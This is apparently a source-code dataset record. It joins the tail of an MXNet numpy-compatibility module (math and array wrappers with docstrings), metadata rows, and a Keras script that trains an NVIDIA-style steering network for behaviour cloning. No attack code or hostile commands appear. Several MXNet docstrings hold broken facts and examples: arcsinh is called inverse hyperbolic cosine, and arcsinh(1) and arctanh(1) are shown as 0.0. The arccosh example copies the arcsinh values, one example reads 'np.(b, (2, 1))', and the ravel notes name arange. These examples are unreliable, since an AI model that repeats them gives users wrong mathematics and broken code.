y : bool or ndarray of bool
Boolean result with the same shape as `x` of the NOT operation
on elements of `x`.
This is a scalar if `x` is a scalar.
Notes
-----
This function differs from the original numpy.logical_not in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> x= np.array([True, False, 0, 1])
>>> np.logical_not(x)
array([0., 1., 1., 0.])
>>> x = np.arange(5)
>>> np.logical_not(x<3)
array([0., 0., 0., 1., 1.])
"""
return _mx_nd_np.logical_not(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arcsinh(x, out=None, **kwargs):
r"""
arcsinh(x, out=None)
Inverse hyperbolic cosine, element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
arcsinh : ndarray
Array of the same shape as `x`.
This is a scalar if `x` is a scalar.
Notes
-----
`arcsinh` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that `sinh(z) = x`.
For real-valued input data types, `arcsinh` always returns real output.
For each value that cannot be expressed as a real number or infinity, it
yields ``nan`` and sets the `invalid` floating point error flag.
This function differs from the original numpy.arcsinh in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Do not support complex-valued input.
- Cannot cast type automatically. DType of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([3.2, 5.0])
>>> np.arcsinh(a)
array([1.8309381, 2.2924316])
>>> np.arcsinh(1)
0.0
"""
return _mx_nd_np.arcsinh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arccosh(x, out=None, **kwargs):
r"""
arccosh(x, out=None)
Inverse hyperbolic cosine, element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
arccosh : ndarray
Array of the same shape as `x`.
This is a scalar if `x` is a scalar.
Notes
-----
`arccosh` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that `cosh(z) = x`.
For real-valued input data types, `arccosh` always returns real output.
For each value that cannot be expressed as a real number or infinity, it
yields ``nan`` and sets the `invalid` floating point error flag.
This function differs from the original numpy.arccosh in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Do not support complex-valued input.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([3.2, 5.0])
>>> np.arccosh(a)
array([1.8309381, 2.2924316])
>>> np.arccosh(1)
0.0
"""
return _mx_nd_np.arccosh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arctanh(x, out=None, **kwargs):
r"""
arctanh(x, out=None)
Inverse hyperbolic tangent, element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
arctanh : ndarray
Array of the same shape as `x`.
This is a scalar if `x` is a scalar.
Notes
-----
`arctanh` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that `tanh(z) = x`.
For real-valued input data types, `arctanh` always returns real output.
For each value that cannot be expressed as a real number or infinity, it
yields ``nan`` and sets the `invalid` floating point error flag.
This function differs from the original numpy.arctanh in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Do not support complex-valued input.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([0.0, -0.5])
>>> np.arctanh(a)
array([0., -0.54930615])
>>> np.arctanh(1)
0.0
"""
return _mx_nd_np.arctanh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def tensordot(a, b, axes=2):
r"""
tensordot(a, b, axes=2)
Compute tensor dot product along specified axes for arrays >= 1-D.
Given two tensors (arrays of dimension greater than or equal to one),
`a` and `b`, and an ndarray object containing two ndarray
objects, ``(a_axes, b_axes)``, sum the products of `a`'s and `b`'s
elements (components) over the axes specified by ``a_axes`` and
``b_axes``. The third argument can be a single non-negative
integer_like scalar, ``N``; if it is such, then the last ``N``
dimensions of `a` and the first ``N`` dimensions of `b` are summed
over.
Parameters
----------
a, b : ndarray, len(shape) >= 1
Tensors to "dot".
axes : int or (2,) ndarray
* integer_like
If an int N, sum over the last N axes of `a` and the first N axes
of `b` in order. The sizes of the corresponding axes must match.
* (2,) ndarray
Or, a list of axes to be summed over, first sequence applying to `a`,
second to `b`. Both elements ndarray must be of the same length.
See Also
--------
dot, einsum
Notes
-----
Three common use cases are:
* ``axes = 0`` : tensor product :math:`a\otimes b`
* ``axes = 1`` : tensor dot product :math:`a\cdot b`
* ``axes = 2`` : (default) tensor double contraction :math:`a:b`
When `axes` is integer_like, the sequence for evaluation will be: first
the -Nth axis in `a` and 0th axis in `b`, and the -1th axis in `a` and
Nth axis in `b` last.
When there is more than one axis to sum over - and they are not the last
(first) axes of `a` (`b`) - the argument `axes` should consist of
two sequences of the same length, with the first axis to sum over given
first in both sequences, the second axis second, and so forth.
Examples
--------
>>> a = np.arange(60.).reshape(3,4,5)
>>> b = np.arange(24.).reshape(4,3,2)
>>> c = np.tensordot(a,b, axes=([1,0],[0,1]))
>>> c.shape
(5, 2)
>>> c
array([[ 4400., 4730.],
[ 4532., 4874.],
[ 4664., 5018.],
[ 4796., 5162.],
[ 4928., 5306.]])
"""
return _mx_nd_np.tensordot(a, b, axes)
@set_module('mxnet.numpy')
def linspace(start, stop, num=50, endpoint=True, retstep=False, dtype=None, axis=0, ctx=None): # pylint: disable=too-many-arguments
r"""
Return evenly spaced numbers over a specified interval.
Returns num evenly spaced samples, calculated over the interval [start, stop].
The endpoint of the interval can optionally be excluded.
Parameters
----------
start : real number
The starting value of the sequence.
stop : real number
The end value of the sequence, unless endpoint is set to False. In
that case, the sequence consists of all but the last of num + 1
evenly spaced samples, so that stop is excluded. Note that the step
size changes when endpoint is False.
num : int, optional
Number of samples to generate. Default is 50. Must be non-negative.
endpoint : bool, optional
If True, stop is the last sample. Otherwise, it is not included.
Default is True.
retstep : bool, optional
If True, return (samples, step), where step is the spacing between samples.
dtype : dtype, optional
The type of the output array. If dtype is not given, infer the data
type from the other input arguments.
axis : int, optional
The axis in the result to store the samples. Relevant only if start or
stop are array-like. By default (0), the samples will be along a new
axis inserted at the beginning. Use -1 to get an axis at the end.
Returns
-------
samples : ndarray
There are num equally spaced samples in the closed interval
`[start, stop]` or the half-open interval `[start, stop)`
(depending on whether endpoint is True or False).
step : float, optional
Only returned if retstep is True
Size of spacing between samples.
See Also
--------
arange : Similar to `linspace`, but uses a step size (instead of the
number of samples).
Examples
--------
>>> np.linspace(2.0, 3.0, num=5)
array([2. , 2.25, 2.5 , 2.75, 3. ])
>>> np.linspace(2.0, 3.0, num=5, endpoint=False)
array([2. , 2.2, 2.4, 2.6, 2.8])
>>> np.linspace(2.0, 3.0, num=5, retstep=True)
(array([2. , 2.25, 2.5 , 2.75, 3. ]), 0.25)
Graphical illustration:
>>> import matplotlib.pyplot as plt
>>> N = 8
>>> y = np.zeros(N)
>>> x1 = np.linspace(0, 10, N, endpoint=True)
>>> x2 = np.linspace(0, 10, N, endpoint=False)
>>> plt.plot(x1.asnumpy(), y.asnumpy(), 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.plot(x2.asnumpy(), (y + 0.5).asnumpy(), 'o')
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.ylim([-0.5, 1])
(-0.5, 1)
>>> plt.show()
Notes
-----
This function differs from the original `numpy.linspace
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.linspace.html>`_ in
the following aspects:
- `start` and `stop` do not support list, numpy ndarray and mxnet ndarray
- axis could only be 0
- There could be an additional `ctx` argument to specify the device, e.g. the i-th
GPU.
"""
return _mx_nd_np.linspace(start, stop, num, endpoint, retstep, dtype, axis, ctx)
@set_module('mxnet.numpy')
def expand_dims(a, axis):
"""Expand the shape of an array.
Insert a new axis that will appear at the `axis` position in the expanded array shape.
Parameters
----------
a : ndarray
Input array.
axis : int
Position in the expanded axes where the new axis is placed.
Returns
-------
res : ndarray
Output array. The number of dimensions is one greater than that of
the input array.
"""
return _npi.expand_dims(a, axis)
@set_module('mxnet.numpy')
def tile(A, reps):
r"""
Construct an array by repeating A the number of times given by reps.
If `reps` has length ``d``, the result will have dimension of
``max(d, A.ndim)``.
If ``A.ndim < d``, `A` is promoted to be d-dimensional by prepending new
axes. So a shape (3,) array is promoted to (1, 3) for 2-D replication,
or shape (1, 1, 3) for 3-D replication. If this is not the desired
behavior, promote `A` to d-dimensions manually before calling this
function.
If ``A.ndim > d``, `reps` is promoted to `A`.ndim by pre-pending 1's to it.
Thus for an `A` of shape (2, 3, 4, 5), a `reps` of (2, 2) is treated as
(1, 1, 2, 2).
Parameters
----------
A : ndarray or scalar
An input array or a scalar to repeat.
reps : a single integer or tuple of integers
The number of repetitions of `A` along each axis.
Returns
-------
c : ndarray
The tiled output array.
Examples
--------
>>> a = np.array([0, 1, 2])
>>> np.tile(a, 2)
array([0., 1., 2., 0., 1., 2.])
>>> np.tile(a, (2, 2))
array([[0., 1., 2., 0., 1., 2.],
[0., 1., 2., 0., 1., 2.]])
>>> np.tile(a, (2, 1, 2))
array([[[0., 1., 2., 0., 1., 2.]],
[[0., 1., 2., 0., 1., 2.]]])
>>> b = np.array([[1, 2], [3, 4]])
>>> np.tile(b, 2)
array([[1., 2., 1., 2.],
[3., 4., 3., 4.]])
>>> np.(b, (2, 1))
array([[1., 2.],
[3., 4.],
[1., 2.],
[3., 4.]])
>>> c = np.array([1,2,3,4])
>>> np.tile(c,(4,1))
array([[1., 2., 3., 4.],
[1., 2., 3., 4.],
[1., 2., 3., 4.],
[1., 2., 3., 4.]])
Scalar as input:
>>> np.tile(2, 3)
array([2, 2, 2]) # repeating integer `2`
"""
return _mx_nd_np.tile(A, reps)
@set_module('mxnet.numpy')
def arange(start, stop=None, step=1, dtype=None, ctx=None):
"""Return evenly spaced values within a given interval.
Values are generated within the half-open interval ``[start, stop)``
(in other words, the interval including `start` but excluding `stop`).
For integer arguments the function is equivalent to the Python built-in
`range` function, but returns an ndarray rather than a list.
Parameters
----------
start : number, optional
Start of interval. The interval includes this value. The default
start value is 0.
stop : number
End of interval. The interval does not include this value, except
in some cases where `step` is not an integer and floating point
round-off affects the length of `out`.
step : number, optional
Spacing between values. For any output `out`, this is the distance
between two adjacent values, ``out[i+1] - out[i]``. The default
step size is 1. If `step` is specified as a position argument,
`start` must also be given.
dtype : dtype
The type of the output array. The default is `float32`.
Returns
-------
arange : ndarray
Array of evenly spaced values.
For floating point arguments, the length of the result is
``ceil((stop - start)/step)``. Because of floating point overflow,
this rule may result in the last element of `out` being greater
than `stop`.
"""
return _mx_nd_np.arange(start, stop, step, dtype, ctx)
@set_module('mxnet.numpy')
def split(ary, indices_or_sections, axis=0):
"""Split an array into multiple sub-arrays.
Parameters
----------
ary : ndarray
Array to be divided into sub-arrays.
indices_or_sections : int or 1-D array
If `indices_or_sections` is an integer, N, the array will be divided
into N equal arrays along `axis`. If such a split is not possible,
an error is raised.
If `indices_or_sections` is a 1-D array of sorted integers, the entries
indicate where along `axis` the array is split. For example,
``[2, 3]`` would, for ``axis=0``, result in
- ary[:2]
- ary[2:3]
- ary[3:]
If an index exceeds the dimension of the array along `axis`,
an empty sub-array is returned correspondingly.
axis : int, optional
The axis along which to split, default is 0.
Returns
-------
sub-arrays : list of ndarrays
A list of sub-arrays.
Raises
------
ValueError
If `indices_or_sections` is given as an integer, but
a split does not result in equal division."""
return _mx_nd_np.split(ary, indices_or_sections, axis=axis)
@set_module('mxnet.numpy')
def concatenate(seq, axis=0, out=None):
"""Join a sequence of arrays along an existing axis.
Parameters
----------
a1, a2, ... : sequence of array_like
The arrays must have the same shape, except in the dimension
corresponding to `axis` (the first, by default).
axis : int, optional
The axis along which the arrays will be joined. If axis is None,
arrays are flattened before use. Default is 0.
out : ndarray, optional
If provided, the destination to place the result. The shape must be
correct, matching that of what concatenate would have returned if no
out argument were specified.
Returns
-------
res : ndarray
The concatenated array.
"""
return _mx_nd_np.concatenate(seq, axis=axis, out=out)
@set_module('mxnet.numpy')
def stack(arrays, axis=0, out=None):
"""Join a sequence of arrays along a new axis.
The axis parameter specifies the index of the new axis in the dimensions of the result.
For example, if `axis=0` it will be the first dimension and if `axis=-1` it will be the last dimension.
Parameters
----------
arrays : sequence of array_like
Each array must have the same shape.
axis : int, optional
The axis in the result array along which the input arrays are stacked.
out : ndarray, optional
If provided, the destination to place the result. The shape must be correct,
matching that of what stack would have returned if no out argument were specified.
Returns
-------
stacked : ndarray
The stacked array has one more dimension than the input arrays."""
return _mx_nd_np.stack(arrays, axis=axis, out=out)
@set_module('mxnet.numpy')
def maximum(x1, x2, out=None):
"""Returns element-wise maximum of the input arrays with broadcasting.
Parameters
----------
x1, x2 : scalar or mxnet.numpy.ndarray
The arrays holding the elements to be compared. They must have the same shape,
or shapes that can be broadcast to a single shape.
Returns
-------
out : mxnet.numpy.ndarray or scalar
The maximum of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars."""
return _mx_nd_np.maximum(x1, x2, out=out)
@set_module('mxnet.numpy')
def minimum(x1, x2, out=None):
"""Returns element-wise minimum of the input arrays with broadcasting.
Parameters
----------
x1, x2 : scalar or mxnet.numpy.ndarray
The arrays holding the elements to be compared. They must have the same shape,
or shapes that can be broadcast to a single shape.
Returns
-------
out : mxnet.numpy.ndarray or scalar
The minimum of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars."""
return _mx_nd_np.minimum(x1, x2, out=out)
@set_module('mxnet.numpy')
def swapaxes(a, axis1, axis2):
"""Interchange two axes of an array.
Parameters
----------
a : ndarray
Input array.
axis1 : int
First axis.
axis2 : int
Second axis.
Returns
-------
a_swapped : ndarray
Swapped array. This is always a copy of the input array.
"""
return _npi.swapaxes(a, dim1=axis1, dim2=axis2)
@set_module('mxnet.numpy')
def clip(a, a_min, a_max, out=None):
"""clip(a, a_min, a_max, out=None)
Clip (limit) the values in an array.
Given an interval, values outside the interval are clipped to
the interval edges. For example, if an interval of ``[0, 1]``
is specified, values smaller than 0 become 0, and values larger
than 1 become 1.
Parameters
----------
a : ndarray
Array containing elements to clip.
a_min : scalar or `None`
Minimum value. If `None`, clipping is not performed on lower
interval edge. Not more than one of `a_min` and `a_max` may be
`None`.
a_max : scalar or `None`
Maximum value. If `None`, clipping is not performed on upper
interval edge. Not more than one of `a_min` and `a_max` may be
`None`.
out : ndarray, optional
The results will be placed in this array. It may be the input
array for in-place clipping. `out` must be of the right shape
to hold the output. Its type is preserved.
Returns
-------
clipped_array : ndarray
An array with the elements of `a`, but where values
< `a_min` are replaced with `a_min`, and those > `a_max`
with `a_max`.
Notes
-----
array_like `a_min` and `a_max` are not supported.
Examples
--------
>>> a = np.arange(10)
>>> np.clip(a, 1, 8)
array([1., 1., 2., 3., 4., 5., 6., 7., 8., 8.], dtype=float32)
>>> a
array([0., 1., 2., 3., 4., 5., 6., 7., 8., 9.], dtype=float32)
>>> np.clip(a, 3, 6, out=a)
array([3., 3., 3., 3., 4., 5., 6., 6., 6., 6.], dtype=float32)
"""
return _mx_nd_np.clip(a, a_min, a_max, out=out)
@set_module('mxnet.numpy')
def argmax(a, axis=None, out=None):
r"""
argmax(a, axis=None, out=None)
Returns the indices of the maximum values along an axis.
Parameters
----------
a : ndarray
Input array. Only support ndarrays of dtype `float16`, `float32`, and `float64`.
axis : int, optional
By default, the index is into the flattened array, otherwise
along the specified axis.
out : ndarray or None, optional
If provided, the result will be inserted into this array. It should
be of the appropriate shape and dtype.
Returns
-------
index_array : ndarray of indices whose dtype is same as the input ndarray.
Array of indices into the array. It has the same shape as `a.shape`
with the dimension along `axis` removed.
Notes
-----
In case of multiple occurrences of the maximum values, the indices
corresponding to the first occurrence are returned.
This function differs from the original `numpy.argmax
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.argmax.html>`_ in
the following aspects:
- Input type does not support Python native iterables(list, tuple, ...).
- Output has dtype that is same as the input ndarray.
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> a = np.arange(6).reshape(2,3) + 10
>>> a
array([[10., 11., 12.],
[13., 14., 15.]])
>>> np.argmax(a)
array(5.)
>>> np.argmax(a, axis=0)
array([1., 1., 1.])
>>> np.argmax(a, axis=1)
array([2., 2.])
>>> b = np.arange(6)
>>> b[1] = 5
>>> b
array([0., 5., 2., 3., 4., 5.])
>>> np.argmax(b) # Only the first occurrence is returned.
array(1.)
Specify ``out`` ndarray:
>>> a = np.arange(6).reshape(2,3) + 10
>>> b = np.zeros((2,))
>>> np.argmax(a, axis=1, out=b)
array([2., 2.])
>>> b
array([2., 2.])
"""
return _mx_nd_np.argmax(a, axis, out)
@set_module('mxnet.numpy')
def mean(a, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""
mean(a, axis=None, dtype=None, out=None, keepdims=None)
Compute the arithmetic mean along the specified axis.
Returns the average of the array elements.
The average is taken over the flattened array by default, otherwise over the specified axis.
Parameters
----------
a : ndarray
ndarray containing numbers whose mean is desired.
axis : None or int or tuple of ints, optional
Axis or axes along which the means are computed. The default is to compute the mean of the flattened array.
If this is a tuple of ints, a mean is performed over multiple axes,
instead of a single axis or all the axes as before.
dtype : data-type, optional
Type to use in computing the mean. For integer inputs, the default is float32;
for floating point inputs, it is the same as the input dtype.
out : ndarray, optional
Alternate output array in which to place the result. The default is None; if provided,
it must have the same shape and type as the expected output.
keepdims : bool, optional
If this is set to True, the axes which are reduced are left in the result
as dimensions with size one. With this option, the result will broadcast correctly
against the input array.
If the default value is passed, then keepdims will not be passed through to the mean
method of sub-classes of ndarray, however any non-default value will be. If the sub-class
method does not implement keepdims any exceptions will be raised.
Returns
-------
m : ndarray, see dtype parameter above
If out=None, returns a new array containing the mean values,
otherwise a reference to the output array is returned.
Notes
-----
This function differs from the original `numpy.mean
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.mean.html>`_ in
the following way(s):
- only ndarray is accepted as valid input, python iterables or scalar is not supported
- default data type for integer input is float32
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> np.mean(a)
array(2.5)
>>> a = np.zeros((2, 512*512), dtype=np.float32)
>>> a[0,:] = 1.0
>>> a[1,:] = 0.1
>>> np.mean(a)
array(0.55)
>>> np.mean(a, dtype=np.float64)
array(0.55)
"""
return _npi.mean(a, axis=axis, dtype=dtype, keepdims=keepdims, out=out)
@set_module('mxnet.numpy')
def std(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
"""
Compute the standard deviation along the specified axis.
Returns the standard deviation, a measure of the spread of a distribution,
of the array elements. The standard deviation is computed for the
flattened array by default, otherwise over the specified axis.
Parameters
----------
a : array_like
Calculate the standard deviation of these values.
axis : None or int or tuple of ints, optional
Axis or axes along which the standard deviation is computed. The
default is to compute the standard deviation of the flattened array.
.. versionadded:: 1.7.0
If this is a tuple of ints, a standard deviation is performed over
multiple axes, instead of a single axis or all the axes as before.
dtype : dtype, optional
Type to use in computing the standard deviation. For arrays of
integer type the default is float64, for arrays of float types it is
the same as the array type.
out : ndarray, optional
Alternative output array in which to place the result. It must have
the same shape as the expected output but the type (of the calculated
values) will be cast if necessary.
ddof : int, optional
Means Delta Degrees of Freedom. The divisor used in calculations
is ``N - ddof``, where ``N`` represents the number of elements.
By default `ddof` is zero.
keepdims : bool, optional
If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option,
the result will broadcast correctly against the input array.
If the default value is passed, then `keepdims` will not be
passed through to the `std` method of sub-classes of
`ndarray`, however any non-default value will be. If the
sub-class' method does not implement `keepdims` any
exceptions will be raised.
Returns
-------
standard_deviation : ndarray, see dtype parameter above.
If `out` is None, return a new array containing the standard deviation,
otherwise return a reference to the output array.
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> np.std(a)
1.1180339887498949 # may vary
>>> np.std(a, axis=0)
array([1., 1.])
>>> np.std(a, axis=1)
array([0.5, 0.5])
In single precision, std() can be inaccurate:
>>> a = np.zeros((2, 512*512), dtype=np.float32)
>>> a[0, :] = 1.0
>>> a[1, :] = 0.1
>>> np.std(a)
array(0.45)
>>> np.std(a, dtype=np.float64)
array(0.45, dtype=float64)
"""
return _npi.std(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
@set_module('mxnet.numpy')
def var(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
"""
Compute the variance along the specified axis.
Returns the variance of the array elements, a measure of the spread of a
distribution. The variance is computed for the flattened array by
default, otherwise over the specified axis.
Parameters
----------
a : array_like
Array containing numbers whose variance is desired. If `a` is not an
array, a conversion is attempted.
axis : None or int or tuple of ints, optional
Axis or axes along which the variance is computed. The default is to
compute the variance of the flattened array.
.. versionadded:: 1.7.0
If this is a tuple of ints, a variance is performed over multiple axes,
instead of a single axis or all the axes as before.
dtype : data-type, optional
Type to use in computing the variance. For arrays of integer type
the default is `float32`; for arrays of float types it is the same as
the array type.
out : ndarray, optional
Alternate output array in which to place the result. It must have
the same shape as the expected output, but the type is cast if
necessary.
ddof : int, optional
"Delta Degrees of Freedom": the divisor used in the calculation is
``N - ddof``, where ``N`` represents the number of elements. By
default `ddof` is zero.
keepdims : bool, optional
If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option,
the result will broadcast correctly against the input array.
If the default value is passed, then `keepdims` will not be
passed through to the `var` method of sub-classes of
`ndarray`, however any non-default value will be. If the
sub-class' method does not implement `keepdims` any
exceptions will be raised.
Returns
-------
variance : ndarray, see dtype parameter above
If ``out=None``, returns a new array containing the variance;
otherwise, a reference to the output array is returned.
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> np.var(a)
array(1.25)
>>> np.var(a, axis=0)
array([1., 1.])
>>> np.var(a, axis=1)
array([0.25, 0.25])
>>> a = np.zeros((2, 512*512), dtype=np.float32)
>>> a[0, :] = 1.0
>>> a[1, :] = 0.1
>>> np.var(a)
array(0.2025)
>>> np.var(a, dtype=np.float64)
array(0.2025, dtype=float64)
>>> ((1-0.55)**2 + (0.1-0.55)**2)/2
0.2025
"""
return _npi.var(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
# pylint: disable=redefined-outer-name
@set_module('mxnet.numpy')
def indices(dimensions, dtype=_np.int32, ctx=None):
"""Return an array representing the indices of a grid.
Compute an array where the subarrays contain index values 0,1,...
varying only along the corresponding axis.
Parameters
----------
dimensions : sequence of ints
The shape of the grid.
dtype : data-type, optional
The desired data-type for the array. Default is `float32`.
ctx : device context, optional
Device context on which the memory is allocated. Default is
`mxnet.context.current_context()`.
Returns
-------
grid : ndarray
The array of grid indices,
``grid.shape = (len(dimensions),) + tuple(dimensions)``.
Notes
-----
The output shape is obtained by prepending the number of dimensions
in front of the tuple of dimensions, i.e. if `dimensions` is a tuple
``(r0, ..., rN-1)`` of length ``N``, the output shape is
``(N,r0,...,rN-1)``.
The subarrays ``grid[k]`` contains the N-D array of indices along the
``k-th`` axis. Explicitly::
grid[k,i0,i1,...,iN-1] = ik
Examples
--------
>>> grid = np.indices((2, 3))
>>> grid.shape
(2, 2, 3)
>>> grid[0] # row indices
array([[0, 0, 0],
[1, 1, 1]])
>>> grid[1] # column indices
array([[0, 0, 0],
[1, 1, 1]], dtype=int32)
The indices can be used as an index into an array.
>>> x = np.arange(20).reshape(5, 4)
>>> row, col = np.indices((2, 3))
>>> x[row, col]
array([[0., 1., 2.],
[4., 5., 6.]])
Note that it would be more straightforward in the above example to
extract the required elements directly with ``x[:2, :3]``.
"""
return _mx_nd_np.indices(dimensions=dimensions, dtype=dtype, ctx=ctx)
# pylint: enable=redefined-outer-name
@set_module('mxnet.numpy')
def copysign(x1, x2, out=None):
r"""copysign(x1, x2, out=None)
Change the sign of x1 to that of x2, element-wise.
If `x2` is a scalar, its sign will be copied to all elements of `x1`.
Parameters
----------
x1 : ndarray or scalar
Values to change the sign of.
x2 : ndarray or scalar
The sign of `x2` is copied to `x1`.
out : ndarray or None, optional
A location into which the result is stored. It must be of the
right shape and right type to hold the output. If not provided
or `None`,a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
The values of `x1` with the sign of `x2`.
This is a scalar if both `x1` and `x2` are scalars.
Notes
-------
This function differs from the original `numpy.copysign
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.copysign.html>`_ in
the following aspects:
- ``where`` param is not supported.
Examples
--------
>>> np.copysign(1.3, -1)
-1.3
>>> 1/np.copysign(0, 1)
inf
>>> 1/np.copysign(0, -1)
-inf
>>> a = np.array([-1, 0, 1])
>>> np.copysign(a, -1.1)
array([-1., -0., -1.])
>>> np.copysign(a, np.arange(3)-1)
array([-1., 0., 1.])
"""
return _mx_nd_np.copysign(x1, x2, out=out)
@set_module('mxnet.numpy')
def ravel(x, order='C'):
r"""
ravel(x)
Return a contiguous flattened array.
A 1-D array, containing the elements of the input, is returned. A copy is
made only if needed.
Parameters
----------
x : ndarray
Input array. The elements in `x` are read in row-major, C-style order and
packed as a 1-D array.
order : `C`, optional
Only support row-major, C-style order.
Returns
-------
y : ndarray
y is an array of the same subtype as `x`, with shape ``(x.size,)``.
Note that matrices are special cased for backward compatibility, if `x`
is a matrix, then y is a 1-D ndarray.
Notes
-----
This function differs from the original numpy.arange in the following aspects:
- Only support row-major, C-style order.
Examples
--------
It is equivalent to ``reshape(x, -1)``.
>>> x = np.array([[1, 2, 3], [4, 5, 6]])
>>> print(np.ravel(x))
[1. 2. 3. 4. 5. 6.]
>>> print(x.reshape(-1))
[1. 2. 3. 4. 5. 6.]
>>> print(np.ravel(x.T))
[1. 4. 2. 5. 3. 6.]
"""
return _mx_nd_np.ravel(x, order)
| 36.362259
| 132
| 0.609708
|
f922b090f347b7a400c781761032812282aaa2c4
| 4,433
|
py
|
Python
|
model.py
|
hirovi/Behaviour_Cloning
|
e602bf665bcd09dbf2e581471b0f7ccbba61a2e5
|
[
"MIT"
] | 1
|
2018-01-07T22:43:47.000Z
|
2018-01-07T22:43:47.000Z
|
model.py
|
hirovi/Behaviour_Cloning
|
e602bf665bcd09dbf2e581471b0f7ccbba61a2e5
|
[
"MIT"
] | null | null | null |
model.py
|
hirovi/Behaviour_Cloning
|
e602bf665bcd09dbf2e581471b0f7ccbba61a2e5
|
[
"MIT"
] | null | null | null |
import csv
import os
import cv2
import sklearn
import numpy as np
from sklearn.utils import shuffle
#Read the data file and append each row
lines = []
with open('data/driving_log.csv', 'r') as csvfile:
reader = csv.reader(csvfile)
for line in reader:
lines.append(line)
#Split data into training and validation
from sklearn.model_selection import train_test_split
train_samples, validation_samples = train_test_split(lines, test_size=0.2)
batch_size = 32
#Define a python generator which will allow reduce the data being fed into the model
def generator(samples, batch_size):
num_samples = len(samples)
while True:
shuffle(samples)
for offset in range(0, num_samples, batch_size):
batch_samples = samples[offset:offset+batch_size]
images, augmented_images, measurements, augmented_measurements = [], [], [], []
for batch_sample in batch_samples:
steering_center = float(batch_sample[3]) #In the CSV is a string so you need to cast it as a float
correction = 0.2 # Correction parameter added to the steering value of the side images from the car
steering_left = steering_center + correction
steering_right = steering_center - correction
#Generalize data reading from Linux or Windows
for i in range(3):
source_path = batch_sample[i]
if '\\' in source_path:
filename = source_path.split('\\')[-1]
else:
filename = source_path.split('/')[-1]
#Save, read and store the image
current_path = 'data/IMG/' + filename
image = cv2.imread(current_path)
images.append(image)
if i == 1:
measurements.append(steering_left)
elif i == 2:
measurements.append(steering_right)
else:
measurements.append(steering_center)
#Go through every image and steering angle and add the flipped image (negative steering)
for image, measurement in zip(images, measurements):
augmented_images.append(image)
augmented_measurements.append(measurement)
augmented_images.append(cv2.flip(image, 1))
augmented_measurements.append(measurement*-1.0)
#Convert the images and measurements into numpy arrays (Keras needs it)
X_train = np.array(augmented_images)
y_train = np.array(augmented_measurements)
yield sklearn.utils.shuffle(X_train, y_train)
#Read next val of the generator
train_generator = generator(train_samples, batch_size)
validation_generator = generator(validation_samples, batch_size)
##Architecture##
#Based on the NVIDIA End to End Learning Paper for Self Driving Cars
from keras.models import Sequential
from keras.layers import Flatten, Dense, Lambda, Activation
from keras.layers.convolutional import Convolution2D, Cropping2D
from keras.layers.pooling import MaxPooling2D
model = Sequential()
model.add(Lambda(lambda x: x/255.0 - 0.5, input_shape=(160, 320, 3)))
model.add(Cropping2D(cropping=((70,25),(0,0)))) # crop 70 pixels of the top, 25 pixels of the bottom, no pixels of the left, no pixels of the right
model.add(Convolution2D(24,5,5, subsample=(2,2), activation='relu')) #24 filters, 5x5 each filter, subsampes are the same as strides in keras
model.add(Convolution2D(36,5,5, subsample=(2,2), activation='relu')) #36 filters, 5x5 each filter
model.add(Convolution2D(48,5,5, subsample=(2,2), activation='relu')) #48 filters, 5x5 each filter
model.add(Convolution2D(64,3,3, activation='relu')) #64 filters, 3x3 each filter
model.add(Convolution2D(64,3,3, activation='relu')) #64 filters, 3x3 each filter
model.add(Flatten())
model.add(Dense(100))
model.add(Dense(50))
model.add(Dense(10))
model.add(Dense(1))
#Use the Adam Optimizer to minimize cost function
model.compile(loss='mse', optimizer='adam')
model.fit_generator(train_generator, samples_per_epoch=len(train_samples)*6, validation_data=validation_generator, nb_val_samples=len(validation_samples), nb_epoch=3)
model.save('model.h5')
exit()
| 43.891089
| 167
